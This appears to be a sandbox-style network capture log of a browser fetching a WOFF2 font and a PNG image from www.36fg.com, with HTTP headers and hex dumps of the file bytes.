                                                        2025-03-15 00:17:59 UTC708INData Raw: d3 58 1d 82 2e 45 a6 99 0b 8a 59 79 25 52 93 63 f5 08 87 cd 27 92 1a 0a 6a 3d 02 03 d0 ed ad 65 cc ea 5c 92 d8 fd 72 e3 b2 29 65 c2 fd db 8e ed 51 76 17 58 d6 81 4e d0 56 fb 8a ca 1b d8 89 db bd 09 d9 67 90 03 07 23 14 47 f9 a5 ed b2 e3 88 50 01 51 06 38 26 31 22 dc f3 af c1 87 bd 2a f8 1c 98 42 5b 67 94 80 c6 9d 07 bd c0 80 cf 97 dc 6b e8 94 5d aa 74 2d 0c 22 2d ca e1 98 c0 c5 b9 e7 8b c1 c7 dd 2a e5 1c 98 83 ba 9f bc 3e d1 d2 00 18 f0 f9 c2 ce 3c 02 a7 5c c8 10 4b 92 94 44 4a 0b d7 6a 3f 21 d9 c2 b9 57 68 c7 6e da a3 70 72 76 8e e7 d6 e5 4e 85 3b 6b cd 3b d6 67 89 bd 17 e1 93 89 e0 eb a6 56 04 36 92 c5 0e 95 f8 32 49 ef 8b d7 40 00 f0 c2 88 35 56 82 18 28 2f 08 78 15 30 20 b0 da cc 4a 66 09 05 e0 13 40 54 19 45 b3 55 28 e1 54 45 06 3e 2b 74 d4 55 ae 48
                                                        Data Ascii: X.EYy%Rc'j=e\r)eQvXNVg#GPQ8&1"*B[gk]t-"-*><\KDJj?!WhnprvN;k;gV62I@5V(/x0 Jf@TEU(TE>+tUH


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.549786104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:59 UTC673OUTGET /static/fonts/4ics6kvjbnbylgokfw72.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:59 UTC937INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:59 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 34260
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        etag: "60e7ae74-85d4"
                                                        strict-transport-security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXmH%2Bajfrah7yEXV7ii6KbPyfwlLzVPnp81biu5rO06bmDeJS%2FkLQLQcqmxOd1baFEXUru%2BDlOZ4pVTPtJuin4wuR3XZKLS0zXbc4CEMfOeX8LTvlG%2Ftw69oErDttAo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b87cbd0c7a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1589&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1245&delivery_rate=1781574&cwnd=188&unsent_bytes=0&cid=89100819b4785bc1&ts=331&x=0"
                                                        2025-03-15 00:17:59 UTC432INData Raw: 77 4f 46 32 00 01 00 00 00 00 85 d4 00 12 00 00 00 01 2e d8 00 00 85 6b 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b f0 56 1c 8e 0a 06 60 16 ad 56 00 81 70 08 84 14 09 8c 23 11 10 0a 82 c0 78 82 a5 72 0b 84 18 00 12 bb 48 01 36 02 24 03 88 2c 04 20 05 82 76 07 88 6a 0c 85 71 5b fd 1d 91 82 c8 c6 be 83 a8 46 45 10 d4 4e 66 a4 5f a8 dd 5a 01 2b d8 ae f0 dc 8e ad e4 fd b3 d7 2a 32 10 6c 1c 68 60 f8 67 d9 ff ff ff ff 9f 9c 4c c6 58 b7 03 b7 01 20 62 56 a9 be f5 42 89 19 8c 78 ca 5e 6a 53 e4 9c 6b d3 39 f7 d2 97 31 f7 b5 d5 92 e1 3d 1b 2a 1e d8 7c ab ac 6c 62 c3 78 c2 85 c3 2b 46 d2 84 24 1c 0e 57 a3 2f b1 5a c6 5b f1 41 36 62 d8 e9 21 86 a2 e0 0c f7 60 8d f0 e2 33 16 15 fb 55 d6 3f af 32 15 cd c8 c2 0e aa 17 d3 08 bd af 7c 0f f5
                                                        Data Ascii: wOF2.kV`Vp#xrH6$, vjq[FENf_Z+*2lh`gLX bVBx^jSk91=*|lbx+F$W/Z[A6b!`3U?2|
                                                        2025-03-15 00:17:59 UTC1369INData Raw: e9 df 8e f7 ce bc f5 ff 8e 88 0d 80 ca ac b2 81 37 e0 e9 e1 5a 64 95 8e 7c 03 34 b7 06 08 8c 0d d8 06 2c 18 8b 63 cd c8 45 c1 06 8b 84 55 c0 60 c0 8a 28 a5 04 0b 14 b0 b1 b0 30 df c7 a8 7a c5 fe 52 bf 2d ec c2 7c c5 ff fe 9b 66 ef dc d7 dd 7a cd 4f 92 25 b7 64 92 81 07 38 e1 56 2b 65 6f a4 90 3c 60 18 26 3b e3 0c cb 2b 87 0c 93 a1 25 c3 d2 f8 cb 23 cb c9 7a 66 89 ec 25 f4 f2 c7 e7 72 e0 6b 97 a7 fd d6 ff ef bc 71 e3 b8 94 94 d0 82 0a ea d6 8d a8 ef c7 3f df 1f f2 fe da e7 3e 0d 76 c0 4c 28 60 a1 d6 80 5a a5 08 06 39 96 df 0a e2 a1 78 db 33 e7 de 11 12 70 08 87 50 df 41 ea 70 aa 42 12 52 eb 6b 7d 55 f5 fa ff 3f e6 fe 7b 88 c9 dd 21 24 95 28 0d cf 26 d9 6d 62 8e 4b 5a 05 cf 24 42 24 c4 f9 ff af ab cd cb c7 e4 af 58 50 79 e7 90 99 1b 6c b1 34 1d dd cd 16 f5
                                                        Data Ascii: 7Zd|4,cEU`(0zR-|fzO%d8V+eo<`&;+%#zf%rkq?>vL(`Z9x3pPApBRk}U?{!$(&mbKZ$B$XPyl4
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 79 83 f4 00 f8 4b df 94 ad bf 3a d8 66 a7 05 96 14 49 d1 75 ad ef 1c b3 6f a5 37 05 4c 70 eb f1 24 7a fe 19 51 fe 6c 49 fa 51 40 d6 85 34 df 84 34 4b 3e b1 5b d9 a5 c9 bd 24 0a e2 22 d1 9a 73 7a d8 91 6d 4e c3 4b ba 20 b3 ca 7e 1c 7c 3d bf 94 e4 e7 e4 d0 19 97 6e 43 5b f3 d4 07 00 d0 8d 00 b3 40 93 08 a1 07 42 7f fa 49 41 8d 68 41 b8 ca f0 a0 f8 77 17 8a 00 34 8b b5 34 40 72 b9 08 ba 39 cb 42 41 ef 9d 78 d1 e1 92 63 18 72 bd 04 44 e9 8b 6c 32 2e 1f bc 01 a0 91 16 a2 ec 6c 3a 77 ba 6d cd e6 ba 70 c5 a0 be 64 d8 51 85 f6 93 7b a0 8d fb f0 4d 61 20 5c 36 05 1f 93 49 e4 df b4 ed cd dd f8 4c 64 37 f3 7a c9 b1 03 4d 2d 82 01 fb 6b ea 9b e7 d8 76 b1 71 88 0a f6 0f a9 13 8b 15 a4 93 f4 5e 89 04 d1 b1 8e 35 8a 55 80 c5 a6 ef 32 4c 65 ea a4 72 b1 53 08 b4 aa 3f c2
                                                        Data Ascii: yK:fIuo7Lp$zQlIQ@44K>[$"szmNK ~|=nC[@BIAhAw44@r9BAxcrDl2.l:wmpdQ{Ma \6ILd7zM-kvq^5U2LerS?
                                                        2025-03-15 00:17:59 UTC1369INData Raw: f3 43 41 8d 49 a7 3b 33 5d 9c 1a 3a 04 a9 34 68 67 db 5f 1e 09 a0 3a c9 2d 46 d3 33 39 ab 73 f6 90 02 5c cf 1e c9 5b 0e cb df f1 ca 0f f6 03 07 30 05 75 34 99 8b f7 18 10 52 28 db 4a 46 f4 50 d7 b4 f8 0f e2 f6 37 a6 9d a3 7c 3a d9 90 a7 38 f3 35 89 80 a6 5b c0 62 ef 28 9f 73 49 28 6d 2e fc 1c b8 09 e0 e8 48 71 5d 6e 5c ec d3 e7 0c 7a 01 56 f3 d3 a0 8e 8a e9 f1 b9 79 db 19 ce 95 92 37 b1 c0 f0 78 1f 55 46 bb 6c a1 17 67 43 73 57 52 5f cd 32 31 89 1b 57 2e 69 4b 67 a4 5b fc 52 2f 10 62 87 90 ee c9 d5 73 4d f2 b4 de 34 d9 99 c0 74 52 70 8d 81 b1 1e e6 4f 73 2c 98 cf 74 68 5a 5b 1e 2e 28 c3 e3 1c 5c 7f b6 a9 b2 e3 e5 15 d3 09 de a1 e3 cd ef 25 22 90 c6 89 19 3a 28 49 b7 76 6f 38 b7 32 6f f7 56 a2 0f fb fe a6 75 ed e6 db bb 1d 34 9b b4 dd ba 18 58 30 31 1f 26
                                                        Data Ascii: CAI;3]:4hg_:-F39s\[0u4R(JFP7|:85[b(sI(m.Hq]n\zVy7xUFlgCsWR_21W.iKg[R/bsM4tRpOs,thZ[.(\%":(Ivo82oVu4X01&
                                                        2025-03-15 00:17:59 UTC1369INData Raw: c7 57 07 b4 e5 06 08 0d f4 20 10 65 8b 7f 71 71 25 0d 8b eb 79 e2 1a 23 7b e1 63 15 2f 76 5c 84 09 68 0f 2e 5f f0 ab c7 31 ce 6c e8 e9 8b 96 e5 cc 0e 00 72 20 12 a6 10 92 8e 1c 74 65 d4 7e 9c 46 d0 43 6e 7b 66 1f b5 d5 ac 5e 86 e5 84 e3 65 04 59 51 ae 87 f7 6c 4b 45 64 a3 a2 49 d9 ac 12 a5 ab 65 6d 29 ac ea db 4d a3 c7 c5 95 e7 66 93 bb a6 87 96 67 7c cf 8d 6e 5f 38 86 b5 c1 c1 c5 c6 c3 59 f9 b8 15 01 3e 21 01 11 a1 6c a2 ce 21 4b e2 82 84 38 72 e5 c9 25 95 47 46 ba 95 93 17 14 94 14 54 94 5b 35 55 4e 43 4b 13 3a f9 b4 5d 50 65 46 5f 30 28 d8 19 0f 94 89 21 cc 2c 4c ac cc 61 63 67 69 c7 39 13 15 59 2a 2c 73 58 e1 8c 55 6b 5c bd 4e 86 6d 14 36 b9 6d 29 5e b7 95 84 ec 28 8d 5d 00 65 80 ca b7 20 de 20 30 08 1f 28 3f 98 8a 80 37 82 0c 40 16 50 aa 1b 4d 56 c3
                                                        Data Ascii: W eqq%y#{c/v\h._1lr te~FCn{f^eYQlKEdIem)Mfg|n_8Y>!l!K8r%GFT[5UNCK:]PeF_0(!,Lacgi9Y*,sXUk\Nm6m)^(]e 0(?7@PMV
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 7a c8 c8 6c b0 1e 5a b9 d4 69 24 8f f2 1a ef 07 2c f2 40 ec 37 b2 ac a2 42 87 dd 66 b5 98 4d 46 83 be 20 5f a7 d5 a8 55 4a 85 5c 26 cd cb 95 88 73 b2 45 42 01 9f 97 99 91 9e c6 a0 51 29 64 92 e5 ac 82 50 94 09 e1 e5 db 28 83 8a cb 3c 49 31 2d 31 91 66 99 cc a6 fc 8e 05 d4 1e 74 4f 66 f4 53 e0 99 bb e5 42 be 2f a0 af 23 23 ab 9a 1a 35 a3 c5 6a 48 37 3d 08 07 93 a0 57 70 e8 7e 38 75 a6 41 a6 b2 7c 22 cf 06 04 c5 7f b1 63 f9 44 ba 4f 3b 3c 55 cd 06 0a 86 eb 0e bb 44 f6 0d e8 5d a8 87 ae 74 0e 1a 49 d4 d6 6a 33 bb d2 fa e9 87 48 b4 59 6d b8 18 9b ec 54 44 d6 1f 26 5c 8e ad 77 f7 6b 08 cd 5b 65 03 c6 35 37 28 e3 49 3f cf 75 14 55 15 f3 79 b0 c3 3c 11 53 36 36 f9 74 21 de 87 0d 4f ca d1 d8 72 d8 db e8 86 a2 d4 db cb ac 1c cc 70 8c 07 0f 3a 87 71 37 0c 1f 62 8f
                                                        Data Ascii: zlZi$,@7BfMF _UJ\&sEBQ)dP(<I1-1ftOfSB/##5jH7=Wp~8uA|"cDO;<UD]tIj3HYmTD&\wk[e57(I?uUy<S66t!Orp:q7b
                                                        2025-03-15 00:17:59 UTC1369INData Raw: b2 d6 ca f0 17 46 86 07 f6 7b 60 94 95 eb 86 5a a5 d4 eb aa d1 00 b0 59 c4 6e db 6e 5f 7e b5 bc 8f 3e 04 69 2d 04 5c 9c ec 6f 52 19 e9 b6 22 2a 18 e1 b9 08 cd e9 6b af 3e 7e aa 1b b6 43 a3 e8 5d c8 5a 1e 2d a5 8a 66 3e 8f 1d 12 c7 d0 18 b9 16 02 8a 6e ea 37 33 f5 79 c0 41 c2 9d 96 d5 55 e6 57 2a d9 04 84 06 64 27 2e 17 a3 ab 47 ee 39 86 89 6d 64 f1 17 79 a7 7b 52 9a c0 48 88 15 15 9b 0d b1 5b 86 cd d0 18 ad 16 9a bf 5d d3 1f 12 48 53 c1 53 cc ac 48 e4 e3 07 a5 81 86 57 61 f8 ee 8d 88 1d 71 69 08 40 6b 11 bb a6 f9 37 34 84 6b c6 33 9c 86 e4 f6 b5 2f 1d 0e 8e e9 c2 8d ea 9b c3 a9 4d 70 7d 3f 56 ef 57 03 dc e2 60 1a 83 a5 e1 fb fe e6 4a 28 b7 74 1d 14 93 d0 fb 90 ad 69 bf 00 aa 0b 66 17 6f f1 ed 84 b9 8e b9 30 5c 7a 82 09 03 40 a8 91 dc 54 2c c4 65 91 6c a5
                                                        Data Ascii: F{`ZYnn_~>i-\oR"*k>~C]Z-f>n73yAUW*d'.G9mdy{RH[]HSSHWaqi@k74k3/Mp}?VW`J(tifo0\z@T,el
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 18 47 65 ab b5 73 dc b4 9b bb b5 2a bf 1d f2 47 4b 73 e7 6d 7a 7c f6 51 e8 7f 2e 1f a8 5e 79 cb c9 4d 0c c8 6b 83 9c d3 20 e8 f7 47 4e 0b 38 7a 3c 60 99 22 79 92 85 9f 78 b0 16 16 88 e9 55 0a c8 07 91 7f 06 21 e1 37 67 21 05 8a e4 81 6b 44 bc c4 5d b2 54 0b b8 b9 56 07 e5 ad 33 f7 aa f7 8b d1 34 90 ea 90 fb d4 f5 53 3b 11 c4 01 7d f6 df 28 1e eb d7 d4 b8 00 84 ac ca 37 e3 8b e0 57 1b 94 c6 fb e0 e0 a0 46 06 1b a5 c4 23 b9 0d 29 3d ca c0 a3 cf 6b 60 4f 46 1b 67 15 58 9c be 9f 1e 53 b5 d4 89 3e c0 b2 79 51 1e 60 ba bd 44 34 6f 31 f3 d3 a7 86 39 c0 ca cb 88 b4 12 cf 97 07 8c f6 a4 08 c2 e8 15 fa 84 fe 4d fe 2a 9f e1 3e f4 62 f9 39 6a 4f 2b ce 65 d3 85 fa 47 4b ea f3 e6 c1 9f a0 92 3d a0 a5 20 ae 5d ca e6 a9 89 e8 ff 21 3b e2 b6 35 d3 db c5 67 0b a7 77 5f 24
                                                        Data Ascii: Ges*GKsmz|Q.^yMk GN8z<`"yxU!7g!kD]TV34S;}(7WF#)=k`OFgXS>yQ`D4o19M*>b9jO+eGK= ]!;5gw_$
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 53 07 d5 e6 ab 61 14 9c 3c 53 7a e2 26 68 ad 71 3b 22 cf b4 2e 3c 3a 3c 93 60 66 69 86 6e 4e ff 2d 43 86 23 a4 7c dd 86 c1 8f d8 97 04 d3 65 33 c5 89 57 28 f5 75 81 07 77 14 45 7a 55 0e ed 5d ae 32 9a 82 d1 27 27 ea 0e 1f 23 e1 04 51 5b 30 59 f2 a4 06 b2 fa a0 7c 28 1f 2f 30 61 b3 12 e5 74 be 44 bf 77 23 de 50 4b 4d 27 e8 a5 02 2f 51 81 ad fc 9a d3 8c 30 47 1a 13 07 e9 af 52 65 2d d6 09 a5 6d 23 03 87 ac 7a eb 6e f7 6e 3e 6f f1 90 d8 28 72 b0 8b b2 6f d4 9e db bc 24 bc b7 ad 32 83 60 78 54 46 94 63 5d d7 cf f9 87 5f 9f 28 4c 1f b4 44 27 d2 96 cb e8 f5 09 76 73 84 23 dc 12 66 c6 19 4d df 62 d9 7c ce 86 5c 64 50 b0 bc a2 ba 8f 5f 0c 8a e8 af 29 47 17 70 38 d6 5f 56 48 61 e4 1c 0b 39 1b a5 67 d2 12 4d 5c 99 25 45 d8 34 76 c5 d0 ef e4 63 37 20 11 d0 34 a8 e1
                                                        Data Ascii: Sa<Sz&hq;".<:<`finN-C#|e3W(uwEzU]2''#Q[0Y|(/0atDw#PKM'/Q0GRe-m#znn>o(ro$2`xTFc]_(LD'vs#fMb|\dP_)Gp8_VHa9gM\%E4vc7 4
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 17 bd c6 29 f5 b5 bc 55 95 64 7e 27 bf a3 92 c2 5d 75 fe f2 5f 29 53 1d f7 98 b5 5e 6e bf d9 46 3a 5f 11 63 c0 af 20 f6 11 a7 82 e9 55 45 5f 68 53 ed e2 16 7f 19 c5 c7 d5 bf 45 84 3e fc ca 18 83 9f 7c de 6c e3 f4 7b 53 6b 6d f7 46 82 0f 2f 52 b4 2c 23 cf d8 d5 c5 33 66 19 99 da 17 b5 69 ae b1 fb e5 65 37 d5 63 b6 84 6c 0a 19 fd 9f 5c 51 de 76 30 bd f0 de 57 94 b2 66 dc ef 3c 7f 13 d5 e2 d9 c4 32 64 19 3c 9b 68 96 3a 9e 7f dc 6f 8a 6a cc ec 98 ca 6a b1 56 51 a8 f1 29 03 12 7f ef 34 db 47 99 46 58 26 f5 ab 82 4a 8f d4 b2 23 60 bb 6e 88 08 83 dd d1 cd e2 cf d2 dd c1 87 74 c3 3c 48 ce 85 b2 94 c7 87 46 0d f2 7d a7 6c 3a ea 9a c4 06 5a 18 fe 4f aa 2e ac fa bd e9 3d 26 72 21 b8 73 d9 93 de 19 82 11 79 32 29 6c c5 a2 73 00 f2 81 6f 7e 12 fb 43 c6 15 a1 1e 77 3f
                                                        Data Ascii: )Ud~']u_)S^nF:_c UE_hSE>|l{SkmF/R,#3fie7cl\Qv0Wf<2d<h:ojjVQ)4GFX&J#`nt<HF}l:ZO.=&r!sy2)lso~Cw?


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.549787104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:59 UTC670OUTGET /static/images/breadcrumb.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/static/css/style.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:59 UTC447INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:59 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 427076
                                                        Connection: close
                                                        Server: cloudflare
                                                        Accept-Ranges: bytes
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:36 GMT
                                                        Etag: "60e7ae78-68444"
                                                        Expires: Sun, 13 Apr 2025 11:46:47 GMT
                                                        Cache-Control: max-age=2592000
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: HIT
                                                        Age: 45077
                                                        CF-RAY: 9207d4b8a8ff7d20-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:59 UTC922INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 80 00 00 02 7c 08 06 00 00 00 1f ca bc 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDR|tEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e f5 37 b6 d3 00 06 80 64 49 44 41 54 78 da ec bd 69 7a 23 3b b2 25 08 73 92 1a 23 32 b3 ab ab bf 5e 48 ff ea ad f4 9a 6b 23 f5 d5 f0 5e de 1b 21 89 93 5b 13 c0 31 c0 00 87 93 3e c0 29 2a 44 7f 4f 79 15 24 e5 84 63 b0 d9 ce a1 ff f7 ff fb f5 df 0c 2e 3e fd df 6d 5d 64 4c cb f6 7f ed e0 8c fb 8d d8 bd ec 7e c5 67 18 a3 9f fe 2d 64 e2 1c a8 eb aa d3 c1 c6 a8 71 94 df 5f 64 86 07 dd fe dc e8 4a ef b1 7d b1 39 bd be 3e fd 3c 9e 7e 5f 93 df 5f 87 d3 7b bb d3 6b 87 f8 87 9c 8f e5 6a 4f 5f fe 4e e6 9b d9 fd c9 04 f0 b5 be 6b ce 2e be 35 11 52 7a 4e be fe 3e 1b 36 38 f6 67 86 fc a1 e0 d6 0f 88 ce 1c 3e 2e 4c b8 fb 7b 7b b5 fe bc 99 97 d3 cf
                                                        Data Ascii: /rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>7dIDATxiz#;%s#2^Hk#^![1>)*DOy$c.>m]dL~g-dq_dJ}9><~__{kjO_Nk.5RzN>68g>.L{{
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 38 71 92 88 0b c9 5f eb 6c e0 83 4d 8c 01 85 e0 70 ed ab c9 c6 c7 4b 1c 50 55 e4 c4 f9 f7 54 16 e8 a4 9c 45 ae a8 83 b4 55 4c 08 30 1f 4d 4c e4 d5 fe 8e 26 5b 13 ae 70 eb ec 1e 2e f0 28 11 d2 05 d6 c4 de 3b 1c c1 e3 85 f5 20 9a bd e6 31 49 50 dc d0 c3 2c c7 07 1f 5c f6 b1 f2 dc e8 2c 64 4f 79 c2 59 51 09 03 4a 2c 7c 2a 9a be 9f a6 87 79 81 7b 73 2e 50 a7 de f3 0f 32 ae f8 ba 4f 93 f8 20 b6 20 c3 26 a8 56 5e 77 d2 49 b7 f2 2b b9 a4 28 bf 2f 64 c7 4a ad 87 c8 39 5b 7c 62 93 77 36 20 f9 8a e4 59 eb 13 b3 2e b9 c7 05 f9 20 91 47 d1 8b 2b 25 33 5b ed 4f 9d df 67 92 50 75 f2 e9 0d f3 60 24 29 ed 5f a7 ad 41 00 b0 fe 64 90 96 2d 36 b9 d5 36 3e 91 f5 17 5e b6 73 f1 0a 23 e0 6f 14 bf f1 bc 23 34 e4 7c b1 24 dc ed f7 fd c6 a4 fe 94 79 41 f2 e6 0d 49 a9 2b 3a 6b ee
                                                        Data Ascii: 8q_lMpKPUTEUL0ML&[p.(; 1IP,\,dOyYQJ,|*y{s.P2O &V^wI+(/dJ9[|bw6 Y. G+%3[OgPu`$)_Ad-66>^s#o#4|$yAI+:k
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 38 16 0f 85 b5 6c 54 1c 89 cc 59 19 95 0a 13 c8 26 cc 2f a3 60 31 20 45 36 11 a1 82 e7 84 02 29 ee 41 57 b0 c8 88 45 af a3 f9 33 29 96 c9 89 a9 ee 8b 94 8e 5e 0f d9 04 b3 43 c2 c3 7a 4e d1 34 09 a0 cf 51 cd cb 0a 68 71 98 3b fe a6 dd 42 f7 1e a9 fb 1c 7f ef b5 e1 49 8b b4 be e9 9d 26 50 63 cf fe 77 27 9c 1f e1 ac bc 7b a5 e9 84 61 65 c8 b1 fb 51 aa ed c4 98 d0 1d 10 e0 5f ad d2 7d 84 e2 da fb f7 43 90 ef ee 48 fc 21 aa 82 ee e7 65 e8 d5 98 b3 5d 9f 1a 02 ef 92 33 e4 1c 21 6b cc 3e 9e 0c c2 7f a1 2b c6 1a bc b6 53 e6 df 06 ce 80 9a 5a a6 65 0e 7e de 9d 39 76 4f 34 90 ed 8d 1a af 83 5d e6 d8 25 19 10 22 b2 ee e9 25 bc 5e 52 98 f5 dc ef e7 cc ff 1e e5 1c 2d dc fd 1b d7 9f 97 ff 1e b3 e4 b3 70 e5 bd 9c 75 e6 0b 34 3a 67 9d 68 35 bb e6 3b 73 55 07 6c 87 f4 fd
                                                        Data Ascii: 8lTY&/`1 E6)AWE3)^CzN4Qhq;BI&Pcw'{aeQ_}CH!e]3!k>+SZe~9vO4]%"%^R-pu4:gh5;sUl
                                                        2025-03-15 00:17:59 UTC1369INData Raw: e6 a8 80 64 ec 93 0f 4d 86 1d 2f bc e8 46 c1 11 ef 0b 1f 9d 32 df 2d ee dd 52 ba 9e 83 63 04 54 f0 ba d5 9c 4b 62 bc f1 32 dc f1 da 1f e7 d6 95 53 a4 ec d8 03 a6 79 83 24 f3 71 66 62 4b e6 25 24 af d9 dd 5b d0 b2 f4 84 f3 54 64 17 56 b4 0e 6b 0a 88 9a 7c 35 9b 88 0a d9 df ef 91 08 f4 2e 04 df ec d8 ee d7 fd 1a 73 ad 6f 16 32 a0 31 e0 76 31 49 b7 95 bb 56 de f1 0a 7e 95 f0 ef ac f2 60 61 57 4d 74 20 57 3f e5 e4 0c 01 bc a3 e5 be 91 3f e1 09 b5 df 6e 95 e3 07 2a 01 05 de 7b 05 28 aa 9d 82 57 6d 72 15 23 6b 4b 8b cc fa e7 1b d3 26 81 7b fd cc 1d 38 c6 f7 5d 7e a6 67 ae 37 df 96 c2 4c a1 41 53 67 29 49 60 52 6a 28 97 02 02 c5 04 09 a3 bb e3 5f e0 65 b1 01 9d ff f4 d0 cf 1a 36 5f 27 17 ab eb 01 52 ad fc 49 27 2b 27 72 38 19 39 ab a4 1e 3a 0c 5d 30 42 ba 16 8e
                                                        Data Ascii: dM/F2-RcTKb2Sy$qfbK%$[TdVk|5.so21v1IV~`aWMt W??n*{(Wmr#kK&{8]~g7LASg)I`Rj(_e6_'RI'+'r89:]0B
                                                        2025-03-15 00:17:59 UTC1369INData Raw: a1 c0 42 a8 40 b6 2a 61 27 d4 1c 74 a5 ce 97 f0 2b 2a e7 10 a0 b6 90 d0 8e 9e 2a 74 03 a3 23 6a 2b e7 30 d2 87 90 31 9f 07 09 ad 33 26 81 4e 05 7b e2 21 8e 9d 57 e8 9c 5d b1 ef 0a 3e 16 6c 93 4f 77 c7 e9 bc ad 26 f1 85 23 7b ce 44 e1 07 16 ae 4a 49 12 ad 4d 84 77 3d 72 9a cc fc d2 a1 87 91 83 6e b3 83 a9 79 b7 93 64 97 14 f5 a8 ee c7 86 22 5c b4 46 16 d2 f3 d8 16 0a 9d 0b c5 ae 7d 3a 82 2e 34 77 dc 0d b3 4f be 04 8e 5d 92 81 39 52 07 67 e7 32 24 69 cd a4 ee f1 62 93 89 c4 0b 9c df 42 91 93 f6 d2 da 51 cf 4d 29 dd bf b6 43 94 04 75 a4 29 f8 9d b9 5f c5 17 64 bd f6 c9 0e 3e ce 4d ae 60 a5 a2 82 38 2a 3b 03 89 54 df 19 cd 75 8e 84 40 29 03 65 21 79 5e 1a 22 8e b8 3b 57 aa 59 c8 15 29 3d c4 fd 52 05 73 8d 70 df 3d 12 ce 2b cc f9 6e e6 39 d7 b6 f6 01 ba d5 26
